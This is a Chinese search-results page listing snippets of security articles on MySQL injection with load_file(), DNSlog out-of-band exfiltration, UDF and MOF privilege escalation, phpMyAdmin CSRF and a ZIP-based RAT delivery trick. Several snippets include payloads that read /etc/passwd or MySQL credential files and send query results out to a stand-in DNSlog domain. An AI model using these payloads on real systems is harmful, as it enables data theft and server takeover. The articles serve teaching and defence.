首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Mysql注入中load_file()函数使用

前言 在Msql注入中,load_file()函数在获得webshell以及提权过程中起着十分重要作用,常被用来读取各种配置文件 而load_file函数只有在满足两个条件情况下才可以使用: 1、文件权限...看过《SQL Injection with MySQL朋友肯定知道用char()函数或者把字符转换成16进制。...2、能够使用union (需要mysql 3以上版本) 3、对方没有对(')进行过滤(因为outfile后面的('')不可以用其他函数代替转换) 后天条件需要二个: 1、就是mysql用户拥有file_priv...常见用法 mysqlload_file()常见用法: 1、replace(load_file(0×2F6574632F706173737764), 0x3c, 0x20) 2、replace(load_file...14、/etc/my.cnf Mysql配置文件 15、c:/mysql/data/mysql/user.MYD 存在MYSQL系统中用户密码 16、/etc/sysconfig/network-scripts

11.6K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    用于绕过安全电子邮件网关特制ZIP文件

    这在一个新网络钓鱼活动中得到了实现,该活动利用了特制ZIP文件,该文件旨在绕过安全电子邮件网关来分发NanoCore RAT。...每个ZIP归档文件都包含一个特殊结构,其中包含压缩数据和有关压缩文件信息。每个ZIP归档文件还包含一个“中央目录结尾”(EOCD)记录,该记录用于指示归档文件结构结尾。 ?.../ 在检查文件时,Trustwave研究人员发现ZIP存档包含两个不同存档结构,每个结构都由自己EOCD记录标记。...如前所述,ZIP存档应该只包含一个EOCD记录,因此这表明ZIP文件是经过特殊设计,包含两个存档结构。 第一个ZIP结构用于一个诱饵order.jpg文件,它只是一个无害图像文件。...例如,Windows内置ZIP提取程序指出该ZIP文件无效,因此不会提取该文件。 ?

    1.2K20

    MySQL ZIP 版本 24 步安装过程

    为了解决这个问题,笔者总结了 ZIP 版本 MySQLMySQL 8.0.18 1045 28000) 24 步安装过程。...尝试启动 MySQL,提示: 发生系统错误 2。 系统找不到指定文件。 ? 4. 切换到 MySQL 解压文件夹 bin 文件夹所在路径: ? 5....去下载 ZIP 版本MYSQL https://dev.mysql.com/downloads/mysql/ 并解压,第一次解压后会发现目录中并没有 data 文件夹。 ? ? 10....再次初始化,有些情况下,由于在删除服务后没有删除 data 文件夹,所以文件夹下会有文件,再次初始化时候,提示 data 文件已经存在了,删除即可。 ? 14....密码永不过期: ALTER USER 'root'@'localhost' PASSWORD EXPIRE NEVER; 到此经过 24 步骤尝试,基本上对 MySQL 8.0.19 ZIP 版本安装算是完成

    89840

    【Java 基础篇】Java Zip压缩:简化文件和文件夹压缩操作

    导言 在Java开发中,经常会遇到需要对文件和文件夹进行压缩和解压缩需求。Java提供了Zip压缩库,使我们能够轻松地进行文件和文件夹压缩操作。...本文将详细介绍Java中Zip压缩功能,并提供示例代码来演示其用法。 一、Zip压缩简介 Zip压缩是一种常见文件压缩格式,它将多个文件和文件夹打包成一个以.zip为后缀压缩包。...压缩后文件可以减小存储空间和网络传输大小,并方便地进行传输和共享。JavaZip压缩库提供了一组API,用于创建、读取和解压缩Zip文件。...压缩文件夹 除了压缩单个文件,JavaZip压缩库还可以压缩整个文件夹。...三、解压缩文件 JavaZip压缩库不仅可以用于压缩文件,还可以用于解压缩已有的Zip文件。下面我们将学习如何使用JavaZip压缩库来解压缩文件。

    4.3K41

    Windows提权系列中篇

    Mysql5.1及以上版本,必须将DLL文件上传到mysql安装目录下lib\plugin文件夹下才能创建自定义函数。...默认情况下’plugin’文件夹并不存在,可能就是为了防止通过into dumpfile将DLL来写到这个文件夹。...可以在webshell中手工创建lib、plugin文件夹,也可以像下面这样利用NTFS ADS流来创建文件夹(5.7.14 权限不足,Errcode: 13 - Permission denied。...拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹 MOF 文件。 也就是说mof提权其实是windows问题,而不是mysql漏洞。...mysql5.7开始默认使用secure-file-priv选项,不能随意选择导出路径,所以mof提权仅适用于以下条件: 操作系统版本低于Windows Server 2008; mysql 版本低于5.7

    2.4K00

    教你一些MySQL数据库入侵及防御方法

    以前有一款工具挖掘鸡可以自定义网站等名称对 zip/rar/tar/tar.gz/gz/sql 等后缀文件进行扫描。...UDF 提权条件: MySQL 版本大于 5.1 版本 udf.dll 文件必须放置于 MySQL 安装目录下 lib\plugin 文件夹下。 MySQL 版本小于 5.1 版本。...5.1 以上版本,必须要把 udf.dll 文件放到 MySQL 安装目录下 libplugin 文件夹下才能创建自定义函数。...该目录默认是不存在,这就需要我们使用 webshell 找到 MySQL 安装目录,并在安装目录下创建 libplugin 文件夹,然后将 udf.dll 文件导出到该目录即可。...the Ripper 下载地址:http://www.openwall.com/john/h/john179w2.zip,John the Ripper 除了能够破解 linux 外,还能破解多种格式密码

    3.9K20

    Dnslog与Http外带

    , 执行命令注入,但是目标站点什么也不显示,无法确定,就可以使用DNSLOG获取回显 函数: master..xp_dirtree #存储程序, 用于获取所有文件夹列表命令 exec master...mysql在windows下注入外带 通过查询,将内容拼接到域名内,让load_file()去访问共享文件,访问域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中...利用条件 服务器必须能正常访问联网 mysql配置文件secure_file_priv="" 读取文件并返回文件内容为字符串。...函数 和之前mysql 查询语句一样 load_file() 利用 简单构造: select load_file('\\\\dnslog.domain.com') 构造payload load_file...外带数据注入不只可以外带注入,如果在权限足够情况下,文件也可以 外带数据常用于延时和盲注,方便读取,不会对服务器发送频繁请求,避免过多流量请求 防御 使用权限划分, 启用WAF 和防火墙等机制 对用户传参进行严格过滤

    1.4K30

    技术分享|Dnslog与Http外带

    , 执行命令注入,但是目标站点什么也不显示,无法确定,就可以使用DNSLOG获取回显 函数: master..xp_dirtree #存储程序, 用于获取所有文件夹列表命令 exec master.....data='%2b@okma%2b''')"' ) -- 在语法中 @okma payload 是可变 mysql_dnslog外带 原理 因为windows特性可以认为主动发送请求,所以造成了mysql...利用条件 服务器必须能正常访问联网 mysql配置文件secure_file_priv="" 读取文件并返回文件内容为字符串。...函数 和之前mysql 查询语句一样 load_file() 利用 简单构造: select load_file('\\\\dnslog.domain.com') 构造payload load_file..., mid(hex((*************)),1,60), 0x2E646E736C6F672E646F6D61696E2E636F6D))--a 搭建mysql外带环境 在phpstudymysql

    2.6K10

    phpMyAdmin 4.7.x CSRF 漏洞利用

    这样利用显得有点复杂,成功率也有限,因此本文我们将介绍几种较为通用利用方式。 在MySQL中支持使用SQL语句来修改当前用户密码。...4 CSRF 漏洞利用 - 获取数据 MySQL提供了load_file()函数来支持读取文件内容操作。...比如读取文件/etc/passwd内容,,对应SQL语句为: 1 select load_file('/etc/passwd'); 但是对于CSRF漏洞来说,该读取操作实在目标用户端执行,我们依然无法知道文件读取结果...而load_file()在Windows下支持从网络共享文件夹中读取文件,如\\192.168.1.100\share\vulnspy.txt。...root 用户密码,对应SQL语句为: 1 SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root

    1.2K80

    使用DNSLog进行盲打

    在线DNSLog平台: http://ceye.io http://www.dnslog.cn 网站总是进不去,麻了。 为什么DNSlog注入只能用于windows系统?...load_file()函数在Linux下是无法用来做DNSLog攻击,因为linux没有UNC这个东西,所以当MySQL处于Linux系统中时候,是不能使用这种方式外带数据。 什么是UNC?...UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器。 UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用网络共享文件就是这个方式。...MySQL数据库,通过DNSLog盲注需要用到load_file()函数,该函数不仅能加载本地文件,同时也能对URL发起请求。...1.SQL盲注,后端数据库用Mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是'\\'代表Microsoft Windows通用命名约定(UNC)文件和目录路径格式利用任何以下扩展存储程序引发

    2.5K20

    弱鸡代码审计之旅

    上面的代码中 path 和 path2 表示路径是同一个,而其实 upload 文件夹下是不存在 tests 文件夹。 ?...,然后直接通过 load_file 函数加载拼接备份文件路径。...其中插入语句是为了添加一个创始人用户,可以达到低权限用户提权到高权限,之后语句是通过 mysql 日志文件进行 getshell。...其中 uptype 为上传文件类型,upfloader 为文件存储路径,这两个变量会用于控制上传文件扩展名和存储路径。之后我们可以在 upload 文件夹看到上传文件: ?...$action 参数用于触发 down_url 函数,可以忽略,另外便是 $source 变量,用于存放远程文件 url,因此应该构造如下数据包,用于触发漏洞: ?

    84420

    蓝队面试经验详细总结

    ()).dnslog.cn/ 或者 \host\ c 利用 mysql load_file() 函数解析拼接过 dnslog 域名,进而带出数据7、联合注入步骤a 找传参点b 判断闭合符c 判断列数...*/12、sqlmap常用参数 a -r :用于post型注入,指定 txt 文件 post 数据包 b -u :指定url,通常用于 get 型注入 c -p:指定注入点,例如: python...id=1&mid=2&page=3 注意:* 号也可以用于伪静态注入,用法同前面一样,直接在注入点后面加 * e -m :用于sqlmap批量跑注入,指定一个含有多个 url txt 文件 f...a php 伪协议:fiter 、 input 、 data 、 zip 、phar b file 协议 c http 和 https3、利用条件 a 本地文件包含不需要开启 allow_url_*...,例如:将文件夹以1.asp命名,该文件夹所有文件都会被当做asp文件执行:1.asp/1.jpg、1.asa/1.jpg、1.cer/1.jpg、1.cdx/1.jpg d IIS 7.0/IIS

    18511
    领券